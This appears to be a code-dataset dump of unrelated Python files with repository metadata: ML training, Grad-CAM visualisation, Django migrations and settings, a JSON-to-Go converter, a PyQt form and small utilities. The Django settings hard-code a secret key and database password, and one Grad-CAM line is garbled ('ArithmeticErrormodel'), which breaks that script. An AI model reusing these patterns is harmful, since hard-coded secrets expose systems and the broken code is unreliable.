np.squeeze(features.cpu().numpy()))])
return sum(v_pred)/len(v_pred)
def train(start_epoch, end_epoch):
"""
Training, includes a call to evaluation
"""
model.train()
for epoch in range(start_epoch, end_epoch):
model.train(mode=True)
all_losses = []
t_pred = []
iterate = tqdm.tqdm(train_set)
for images, features in iterate:
image_var = Variable(images).cuda()
label_var = Variable(features).cuda()
loss, preds = model.train_batch(image_var, label_var)
all_losses.append(loss)
t_pred.extend([1 if p == g else 0 for p,g in
zip(preds.cpu().data.numpy(),
np.squeeze(features.cpu().numpy()))])
checkpoint_path = 'single_feature_%i.%i.checkpoint'%(feature_id, epoch)
model.save_model(checkpoint_path)
print('{} Train Loss: {:.5f} Acc: {:.5f} Test Acc: {:.5f}'
.format(epoch, sum(all_losses)/len(all_losses),
sum(t_pred)/len(t_pred), run_eval()))
return all_losses
# If a model is passed in, run evaluation and exit
if len(sys.argv) == 2:
model = pickle.load(open(sys.argv[1], 'rb'))
print(run_eval())
sys.exit()
# Else, train and save
train(0,50)
pickle.dump(model, open('model.pkl','wb'))
| [
"[email protected]"
] | |
bbae7a21d6d580ad1f1d9163983022e45a1c1303 | f5877f2dede5e6ba08a029d180c9e7e6278c1069 | /kindle/migrations/0017_delete_ebookreview.py | df8b2089344e2104cdb7fd10a921a2387c21a48b | [] | no_license | Kiviak/kivi-site | 499447cb48d9cdb1f447bbbdb21ac39bd07a2179 | 4a83048ee0fcd174a217fc046598fa82d67bb8ef | refs/heads/master | 2023-03-23T05:40:54.375311 | 2021-03-15T15:32:26 | 2021-03-15T15:32:26 | 347,594,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # Generated by Django 2.2.4 on 2020-10-17 01:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kindle', '0016_ebookreview'),
]
operations = [
migrations.DeleteModel(
name='Ebookreview',
),
]
| [
"[email protected]"
] | |
8b347ac4d0c0ec371f58b5f2f8899224e482b769 | 96808573f1f20cb927ee32121bc65f64de006a99 | /Task3/Grad-CAM_process.py | 7edf237b20e6a6f4357ea8327409c6ff2a4fe8b1 | [] | no_license | zyandtom/images-of-bee-and-wasp-classification | 7f9d622761624e70260c5774d9df343c23ab6d2a | d257d434fc4ab6c1f4131ea9e95e9fb3785747a4 | refs/heads/main | 2023-03-08T19:27:44.039326 | 2021-02-08T11:40:40 | 2021-02-08T11:40:40 | 325,052,003 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,795 | py | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models
class FeatureExtractor():
""" Class for extracting activations and
registering gradients from targetted intermediate layers """
def __init__(self, model, target_layers):
self.model = model
self.target_layers = target_layers
self.gradients = []
def save_gradient(self, grad):
self.gradients.append(grad)
def __call__(self, x):
outputs = []
self.gradients = []
for name, module in self.model._modules.items():
x = module(x)
if name in self.target_layers:
x.register_hook(self.save_gradient)
outputs += [x]
return outputs, x
class ModelOutputs():
""" Class for making a forward pass, and getting:
1. The network output.
2. Activations from intermeddiate targetted layers.
3. Gradients from intermeddiate targetted layers. """
def __init__(self, model, feature_module, target_layers):
self.model = model
self.feature_module = feature_module
self.feature_extractor = FeatureExtractor(self.feature_module, target_layers)
def get_gradients(self):
return self.feature_extractor.gradients
def __call__(self, x):
target_activations = []
for name, module in self.model._modules.items():
if module == self.feature_module:
target_activations, x = self.feature_extractor(x)
elif "avgpool" in name.lower():
x = module(x)
x = x.view(x.size(0),-1)
else:
x = module(x)
return target_activations, x
def preprocess_image(img):
means = [0.485, 0.456, 0.406]
stds = [0.229, 0.224, 0.225]
preprocessed_img = img.copy()[:, :, ::-1]
for i in range(3):
preprocessed_img[:, :, i] = preprocessed_img[:, :, i] - means[i]
preprocessed_img[:, :, i] = preprocessed_img[:, :, i] / stds[i]
preprocessed_img = \
np.ascontiguousarray(np.transpose(preprocessed_img, (2, 0, 1)))
preprocessed_img = torch.from_numpy(preprocessed_img)
preprocessed_img.unsqueeze_(0)
input = preprocessed_img.requires_grad_(True)
return input
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
cv2.imwrite("cam.jpg", np.uint8(255 * cam))
class GradCam:
def __init__(self, model, feature_module, target_layer_names, use_cuda):
self.model = model
self.feature_module = feature_module
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
self.extractor = ModelOutputs(self.model, self.feature_module, target_layer_names)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
features, output = self.extractor(input.cuda())
else:
features, output = self.extractor(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
self.feature_module.zero_grad()
self.model.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.extractor.get_gradients()[-1].cpu().data.numpy()
target = features[-1]
target = target.cpu().data.numpy()[0, :]
weights = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.zeros(target.shape[1:], dtype=np.float32)
for i, w in enumerate(weights):
cam += w * target[i, :, :]
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, input.shape[2:])
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input):
positive_mask = (input > 0).type_as(input)
output = torch.addcmul(torch.zeros(input.size()).type_as(input), input, positive_mask)
self.save_for_backward(input, output)
return output
@staticmethod
def backward(self, grad_output):
input, output = self.saved_tensors
grad_input = None
positive_mask_1 = (input > 0).type_as(grad_output)
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = torch.addcmul(torch.zeros(input.size()).type_as(input),
torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output,
positive_mask_1), positive_mask_2)
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model, use_cuda):
self.model = model
self.model.eval()
self.cuda = use_cuda
if self.cuda:
self.model = model.cuda()
def recursive_relu_apply(module_top):
for idx, module in module_top._modules.items():
recursive_relu_apply(module)
if module.__class__.__name__ == 'ReLU':
module_top._modules[idx] = GuidedBackpropReLU.apply
# replace ReLU with GuidedBackpropReLU
recursive_relu_apply(self.model)
def forward(self, input):
return self.model(input)
def __call__(self, input, index=None):
if self.cuda:
output = self.forward(input.cuda())
else:
output = self.forward(input)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
if self.cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
# self.model.features.zero_grad()
# self.model.classifier.zero_grad()
one_hot.backward(retain_graph=True)
output = input.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--use-cuda', action='store_true', default=False,
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
args = parser.parse_args()
args.use_cuda = args.use_cuda and torch.cuda.is_available()
if args.use_cuda:
print("Using GPU for acceleration")
else:
print("Using CPU for computation")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img*255)
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for VGG19 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
# Can work with any model, but it assumes that the model has a
# feature method, and a classifier method,
# as in the VGG models in torchvision.
ArithmeticErrormodel = models.resnet50(pretrained=True)
grad_cam = GradCam(model=model, feature_module=model.layer4, \
target_layer_names=["2"], use_cuda=args.use_cuda)
img = cv2.imread(args.image_path, 1)
img = np.float32(cv2.resize(img, (224, 224))) / 255
input = preprocess_image(img)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested index.
target_index = None
mask = grad_cam(input, target_index)
show_cam_on_image(img, mask)
gb_model = GuidedBackpropReLUModel(model=model, use_cuda=args.use_cuda)
print(model._modules.items())
gb = gb_model(input, index=target_index)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([mask, mask, mask])
cam_gb = deprocess_image(cam_mask*gb)
gb = deprocess_image(gb)
cv2.imwrite('gb.jpg', gb)
cv2.imwrite('cam_gb.jpg', cam_gb) | [
"[email protected]"
] | |
935b16a38fcaba928a29d44bbc7a841d33eb51cb | 3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1 | /pytools/vision/bin/flickr/flickr_stats.py | 1ff3bf8e1fc363943d924d4d6bc9df7f4bced428 | [] | no_license | stefie10/slu_hri | a76f79094bd1740676fec5d889411ba3b1d9dc26 | 50753379953e1ff822162eeab094cffe4a30f3e1 | refs/heads/master | 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,271 | py | from sys import argv
from sorting import quicksort
from scipy import array
from pylab import *
import cPickle
#from wordnet import *
#from wntools import *
def filter_load(filename):
myfile = open(filename, 'r')
mylist = {}
for line in myfile:
mylist[line.strip().replace(' ', '')] = True
return mylist
def flickr_stats(filename, filter_filename=None):
prior = cPickle.load(open(filename, 'r'))
print "number of tags:", len(prior.keys())
myfilter = None
if(filter_filename != None):
myfilter = filter_load(filter_filename)
mytags_hash = {}
for obj in prior.keys():
location = prior[obj]
#for elt in myfilter:
try:
if(myfilter != None and myfilter[obj]):
mytags_hash[obj] = sum(location.values())
elif(myfilter == None):
mytags_hash[obj] = sum(location.values())
except:
continue
num_locations = len(prior.keys())
num_objects = len(mytags_hash.keys())
print "number of locations:", num_locations
print "number of objects:", num_objects
K = array(mytags_hash.keys())
Vs = array(mytags_hash.values())
V, I = quicksort(mytags_hash.values())
print "number of flowers:", mytags_hash["flower"]
#for i in range(len(mytags_hash.keys())):
# print mytags_hash.keys()[i], mytags_hash.values()[i]
#print "final key", K[I[len(V)-1]]
#print "final value", Vs[I[len(V)-1]]
print len(I), len(V)
mf_keys = K.take(I[len(I)-100:len(I)]).tolist()
mf_vals = array(Vs).take(I[len(I)-100:len(I)]).tolist()
mf_keys.reverse()
mf_vals.reverse()
p2 = bar(arange(len(mf_vals)), mf_vals, color='b', width=0.8)
setp(gca(), 'xticks', arange(len(mf_vals)))
labels = setp(gca(), 'xticklabels', mf_keys)
setp(labels, 'rotation', 'vertical')
print mf_keys
#labels = xticks(arange(len(mf_vals)), mf_keys)
#xticks(arange(len(mf_vals)), mf_keys)
show()
if __name__=="__main__":
if(len(argv)==2):
flickr_stats(argv[1])
if(len(argv)==3):
flickr_stats(argv[1], argv[2])
else:
print "usage:\n\t python flickr_stats.py prior.pck filter_filename"
| [
"[email protected]"
] | |
1f7c5f922cb681d1ea0aa518d8d9df8d7541f02c | 4bd43dee6668fe292f8061a290c56a4baba029f2 | /carzone/carzone/settings.py | 6963aafdafc30126aabf7f4949fa9488225207a7 | [] | no_license | 2anirban/carzone | 95ab9f1f5b8b8bda50774f9e0cee4f394b3c3f08 | aaacdce00c1187950800c0dd1eed04a440bcb520 | refs/heads/master | 2023-06-15T01:51:15.588197 | 2021-07-10T18:19:21 | 2021-07-10T18:19:21 | 378,468,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,521 | py | """
Django settings for carzone project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-u%sx#9*p3x-07s8kc6^h(m=psn2-*+fysg%o$et^+dit-q%*e0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pages',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'carzone.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'carzone.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'carzone_db',
'USER':'postgres',
'PASSWORD':'whatever20',
'HOST':'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT=os.path.join(BASE_DIR,"staticfiles")
STATICFILES_DIRS=[
os.path.join(BASE_DIR,'static'),
]
STATIC_ROOT=os.path.join(BASE_DIR,"media")
MEDIA_URL='/media/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
879a085d92a6ba1aa7ef32ce51ca1781ac30159c | 8996489f875657a4010c700139c8d59c7ad5a07c | /python/src/app.py | 672c8f0ac9130ead45a6ec22bf197e1f5e852d87 | [] | no_license | hodory/docker-package | d17277c6368689c83d745475c3f55549b899988a | b7d73fa7fe94613eda53a561192ee7ad5339a342 | refs/heads/master | 2020-12-21T12:15:48.310076 | 2020-02-06T08:02:33 | 2020-02-06T08:02:33 | 236,428,265 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | from konlpy.tag import Mecab, Kkma, Okt
from konlpy.utils import pprint
mecab = Mecab()
kkma = Kkma()
twitter = Okt()
string = '동해물과백두산이마르고닳도록'
print('# Mecab 형태소 분석')
pprint(mecab.morphs(string))
print('# 꼬꼬마 형태소 분석')
pprint(kkma.morphs(string))
print('# 트위터 형태소 분석')
pprint(twitter.morphs(string))
print('# 트위터 문구 추출')
pprint(twitter.phrases(string)) | [
"[email protected]"
] | |
694da9966a98ba7f6cfaaa11f69a9d335b534840 | f63e4c3e9d9c3877a0046b33d699400ac527a6f3 | /src/jsontogo/10oops.py | de3c59d6524100e4769f4a216d9590504eae2b3b | [] | no_license | podhmo/advent2016 | d96d33097fc509fe1eae5cf4869815962eff5dec | 40b8386db7df3041187933325d4caa755e297c71 | refs/heads/master | 2020-06-13T01:54:38.795497 | 2016-12-12T15:05:26 | 2016-12-12T15:05:26 | 75,465,938 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,289 | py | # -*- coding:utf-8 -*-
# see: https://mholt.github.io/json-to-go/
# original: https://github.com/mholt/json-to-go/blob/master/json-to-go.js
import re
import json
from collections import defaultdict
from collections import deque
from prestring import NameStore
from prestring import PreString
from prestring import LazyFormat
from prestring.go import GoModule
from prestring.go import goname as to_goname
def json_to_go(json_string, name, m=None, rx=re.compile("\.0", re.M)):
m = m or GoModule()
data = json.loads(rx.sub(".1", json_string))
s = detect_struct_info(data, name)
with m.import_group() as im:
pass
emit_code(s, name, m=m, im=im)
im.clear_ifempty()
return m
def resolve_type(val, time_rx=re.compile("\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d(\.\d+)?(\+\d\d:\d\d|Z)")):
if val is None:
return "interface{}"
if isinstance(val, bool):
return "bool"
elif isinstance(val, str):
if time_rx.match(val):
return "time.Time"
elif "://" in val:
return "github.com/go-openapi/strfmt.Uri"
else:
return "string"
elif isinstance(val, int):
if val > -2147483648 and val < 2147483647:
return "int"
else:
return "int64"
elif isinstance(val, float):
return "float64"
elif hasattr(val, "keys"):
return "struct"
elif isinstance(val, (list, tuple)):
return "slice"
else:
raise ValueError("unsupported for {!r}".format(val))
def select_better_type(*types):
s = {t for t in types if t is not None}
if "float64" in s:
return "float64"
elif "int64" in s:
return "int64"
else:
return s.pop()
def detect_struct_info(d, name):
def _detect_struct_info(d, s, name):
if hasattr(d, "keys"):
s["type"] = "struct"
s["jsonname"] = name
s["freq"] += 1
for k, v in d.items():
goname = to_goname(k)
_detect_struct_info(v, s["children"][goname], k)
elif isinstance(d, (list, tuple)):
s["type2"] = "slice"
for x in d:
_detect_struct_info(x, s, name) # xxx
else:
typ = resolve_type(d)
s["jsonname"] = name
s["freq"] += 1
s["type"] = select_better_type(s["type"], typ)
s["example"] = d
def make_struct_info():
return {"freq": 0, "type": None, "children": defaultdict(make_struct_info)}
s = defaultdict(make_struct_info)
goname = to_goname(name)
_detect_struct_info(d, s[goname], goname)
return s[goname]
def to_type_struct_info(sinfo):
if sinfo.get("type2") == "slice":
return "[]" + sinfo["type"]
else:
return sinfo["type"]
def is_omitempty_struct_info(subinfo, sinfo):
return subinfo["freq"] < sinfo["freq"]
def emit_code(sinfo, name, m, im, name_score_map={"parent": -1, '': -10}):
cw = CommentWriter(m, name, sinfo)
ns = NameStore()
defs = set()
typename_map = defaultdict(lambda: PreString(""))
def make_signature(sinfo):
return tuple([(k, v["type"], v.get("type2")) for k, v in sorted(sinfo["children"].items())])
def emit_structure_comment(sinfo, name, parent=None):
if sinfo.get("type") == "struct":
cw.write(name, sinfo, parent=parent)
for name, subinfo in sorted(sinfo["children"].items()):
emit_structure_comment(subinfo, name, parent=sinfo)
def _emit_struct(sinfo, name, parent=None):
m.comment(LazyFormat("{name} : auto generated JSON container", name=name))
with m.type_(name, to_type_struct_info(sinfo)):
for name, subinfo in sorted(sinfo["children"].items()):
_emit_code(subinfo, name, m, parent=sinfo)
def _emit_code(sinfo, name, m, parent=None):
if "." in sinfo.get("type"):
im.import_(sinfo.get("type").rsplit(".", 1)[0])
if sinfo.get("type") == "struct":
signature = make_signature(sinfo)
cont.append((name, sinfo, signature))
typ = typename_map[signature]
typ.body.append(name)
else:
typ = to_type_struct_info(sinfo)
if "/" in typ:
typ = typ.rsplit("/", 1)[-1]
m.stmt(LazyFormat('{} {}', name, typ))
# append tag
omitempty = ",omitempty" if is_omitempty_struct_info(sinfo, parent) else ""
example = ' example:"{}"'.format(sinfo["example"]) if "example" in sinfo else ""
m.insert_after(' `json:"{}{omitempty}"{example}`'.format(sinfo["jsonname"], omitempty=omitempty, example=example))
emit_structure_comment(sinfo, name, parent=None)
cont = deque([(name, sinfo, make_signature(sinfo))])
while cont:
name, sinfo, signature = cont.popleft()
if signature in defs:
continue
defs.add(signature)
typename_map[signature].body.append(name)
_emit_struct(sinfo, typename_map[signature])
for signature, lazy_typename in typename_map.items():
candidates = set(lazy_typename.body)
new_name = max(candidates, key=lambda k: name_score_map.get(k.lower(), 0))
ns[signature] = new_name
lazy_typename.body.clear()
lazy_typename.body.append(ns[signature])
return m
class CommentWriter(object):
def __init__(self, m, name, sinfo):
m.stmt("/* structure")
cm = GoModule()
m.stmt(cm)
cm.stmt(name)
self.cm_map = {sinfo["jsonname"]: cm}
m.stmt("*/")
def write(self, name, sinfo, parent=None):
if parent is None:
return
cm = self.cm_map[parent["jsonname"]]
with cm.scope():
cm.stmt(name)
self.cm_map[sinfo["jsonname"]] = cm.submodule(newline=False)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--package", type=str, default="autogen")
parser.add_argument("--name", type=str, default="AutoGenerated")
parser.add_argument("src", type=argparse.FileType('r'))
args = parser.parse_args()
m = GoModule()
m.package(args.package)
print(json_to_go(args.src.read(), args.name, m))
| [
"[email protected]"
] | |
e377b090ff7120577d1010807e18b1466e5ce87a | 3471d4aa328eddcef54f0236d2166ebbafc053e5 | /img_classify/Ui_ClassifyForm.py | 3048781d5cd138f0f39c94a845fb21ec15872ee0 | [] | no_license | gjz22cn/tf | 4b434535440eac0987f924050f2b1ee45005c842 | 725119d2a96812325aada7d58f86ae9a78a81452 | refs/heads/master | 2020-05-01T04:41:51.129308 | 2019-12-02T13:06:48 | 2019-12-02T13:06:48 | 177,281,567 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,664 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Ui_ClassifyForm.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ClassifyForm(object):
def setupUi(self, ClassifyForm):
ClassifyForm.setObjectName("ClassifyForm")
ClassifyForm.resize(450, 270)
self.classifyBtn = QtWidgets.QPushButton(ClassifyForm)
self.classifyBtn.setGeometry(QtCore.QRect(330, 40, 90, 30))
self.classifyBtn.setObjectName("classifyBtn")
'''
self.zhileiBtn = QtWidgets.QPushButton(ClassifyForm)
self.zhileiBtn.setGeometry(QtCore.QRect(330, 80, 90, 30))
self.zhileiBtn.setObjectName("zhileiBtn")
self.boliBtn = QtWidgets.QPushButton(ClassifyForm)
self.boliBtn.setGeometry(QtCore.QRect(330, 120, 90, 30))
self.boliBtn.setObjectName("boliBtn")
self.suliaoBtn = QtWidgets.QPushButton(ClassifyForm)
self.suliaoBtn.setGeometry(QtCore.QRect(330, 160, 90, 30))
self.suliaoBtn.setObjectName("suliaoBtn")
'''
self.exitBtn = QtWidgets.QPushButton(ClassifyForm)
self.exitBtn.setGeometry(QtCore.QRect(330, 150, 90, 30))
self.exitBtn.setObjectName("exitBtn")
self.imageLabel = QtWidgets.QLabel(ClassifyForm)
self.imageLabel.setGeometry(QtCore.QRect(40, 10, 240, 240))
self.imageLabel.setText("")
self.imageLabel.setObjectName("imageLabel")
self.resultLabel = QtWidgets.QLabel(ClassifyForm)
self.resultLabel.setGeometry(QtCore.QRect(330, 80, 90, 20))
self.resultLabel.setObjectName("resultLabel")
self.closeBtn = QtWidgets.QPushButton(ClassifyForm)
self.closeBtn.setGeometry(QtCore.QRect(330, 190, 90, 30))
self.closeBtn.setObjectName("closeBtn")
self.retranslateUi(ClassifyForm)
QtCore.QMetaObject.connectSlotsByName(ClassifyForm)
def retranslateUi(self, ClassifyForm):
_translate = QtCore.QCoreApplication.translate
ClassifyForm.setWindowTitle(_translate("ClassifyForm", "分类"))
self.classifyBtn.setText(_translate("ClassifyForm", "识 别"))
'''
self.zhileiBtn.setText(_translate("ClassifyForm", "纸 类"))
self.boliBtn.setText(_translate("ClassifyForm", "玻 璃"))
self.suliaoBtn.setText(_translate("ClassifyForm", "塑 料"))
'''
self.exitBtn.setText(_translate("ClassifyForm", "退 出"))
self.resultLabel.setText(_translate("ClassifyForm", "TextLabel"))
self.closeBtn.setText(_translate("ClassifyForm", "关 机"))
| [
"[email protected]"
] | |
79cfe271cd082d64ec52a9e1d940fff9ff994924 | 22c6405b1ac254dd6cefa196d793940013d63cf6 | /Jayraj-Patel-Model/Lat-Longs/Miniso Analysis/Minso Distance Code.py | 9554ce0ed4277d00c597e96469c3062b48d2ccc9 | [] | no_license | aripirala/Predictive-Model---Claires | bf125c6eacdd4d2477e9641973608004ae0b8ae8 | c91c877e9f7d11e81cf680ca1b489dd3a63826c6 | refs/heads/master | 2018-10-17T11:17:36.964490 | 2018-08-01T14:40:40 | 2018-08-01T14:40:40 | 115,640,960 | 1 | 1 | null | 2018-01-26T15:47:33 | 2017-12-28T16:29:25 | Python | UTF-8 | Python | false | false | 2,303 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 20 11:51:50 2018
@author: patelj
"""
from math import sin, cos, sqrt, atan2, radians
import pandas as pd
import numpy as np
import xlsxwriter
FILE_PATH_INPUT = 'C:/Users/patelj/Documents/Lat-Longs/'
FILE_PATH_OUTPUT = 'C:/Users/patelj/Documents/Lat-Longs/Miniso Analysis/'
R = 6373.0
miniso_df = pd.read_excel(FILE_PATH_INPUT+'Miniso-Lat-Long.xlsx', sheetname='Data')
claires_df = pd.read_excel(FILE_PATH_INPUT+'NA-Lat-Longs.xlsm', sheetname='Data')
###-------Test Code for one set of coordinates-------###
#lat1 = claires_df["Latitude"].values[1274]
#lon1 = claires_df["Longitude"].values[1274]
#lat2 = miniso_df["Latitude"].values[11]
#lon2 = miniso_df["Longitude"].values[11]
#lat1 = radians(lat1)
#lon1 = radians(lon1)
#lat2 = radians(lat2)
#lon2 = radians(lon2)
#dlon = lon2 - lon1
#dlat = lat2 - lat1
#a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2
#c = 2 * atan2(sqrt(a), sqrt(1 - a))
#distance = R * c
#print("Result:", distance)
###-------End Test Code-------###
dist_list = []
#dist_output_df = pd.DataFrame(index=claires_df.index)
for x in range(0,1276):
lat1 = claires_df["Latitude"].values[x]
lon1 = claires_df["Longitude"].values[x]
lat1 = radians(lat1)
lon1 = radians(lon1)
for i in range(0,13):
lat2 = miniso_df["Latitude"].values[i]
lon2 = miniso_df["Longitude"].values[i]
lat2 = radians(lat2)
lon2 = radians(lon2)
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2
c = 2 * atan2(sqrt(a), sqrt(1 - a))
distance = R * c
miles_dist = distance * 0.621371
#print("Result:", miles_dist)
dist_list.append(miles_dist)
new_list = np.array(dist_list)
new_list = new_list.reshape(1276,13)
dist_output_df = pd.DataFrame(new_list)
#dist_output_df.to_excel(FILE_PATH_OUTPUT+'Miniso Distance Output.xlsx')
#print((new_list<1))
one_list = []
one_list_df = pd.DataFrame(index = range(len(one_list)))
for m in range(0, 1276):
min_list = (new_list[m,:]<1).sum()
one_list.append(min_list)
one_list_df["Store Number"] = claires_df["Store ID"]
one_list_df["Miniso"] = one_list
#one_list_df.to_excel(FILE_PATH_OUTPUT+"Min List.xlsx")
| [
"[email protected]"
] | |
12c65b4950d31c0a8501917e0f33acb0a872566d | 7561171f1bca9726b69bb7e58cb772f100dcefa8 | /polls/migrations/0001_initial.py | 1971ef4874190a26cc0f7c1421661703d08f7a16 | [] | no_license | csportat/CMPUT404_lab4_django | 2a1a003dc98e55a0223bc0be9375213b4f5f9590 | a0eab270b540a716a49831a3083325f7aa08b7d1 | refs/heads/main | 2023-09-01T11:57:34.708717 | 2021-10-01T17:14:15 | 2021-10-01T17:14:15 | 412,449,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | # Generated by Django 3.2.7 on 2021-10-01 13:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.CreateModel(
name='Choice',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.question')),
],
),
]
| [
"[email protected]"
] | |
d13fe00841df091809061e6469f8a6d1e06cb02e | c64a98cd5c130e8aa48605b415d8b97fc0585510 | /3.16.5.py | cf867e2dad357d1241dc20c6ae62731649db4c5f | [] | no_license | bentd/think-python | bbd57b224a5caf7fcf3dc9590b247b7c1ac79da7 | b3a940f08df32e1c7f36a65717caf44aabd3eadc | refs/heads/master | 2020-07-18T08:05:14.321020 | 2019-09-04T02:13:36 | 2019-09-04T02:13:36 | 206,210,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | def do_quad(i, f):
i()
f()
f()
f()
f()
i()
f()
f()
f()
f()
i()
def print_line():
a='+'
s=4*'-'
print a,s,a,s,a
def print_space():
l='|';
p=4*' ';
print l,p,l,p,l
def run():
do_quad(print_line, print_space)
run()
| [
"[email protected]"
] | |
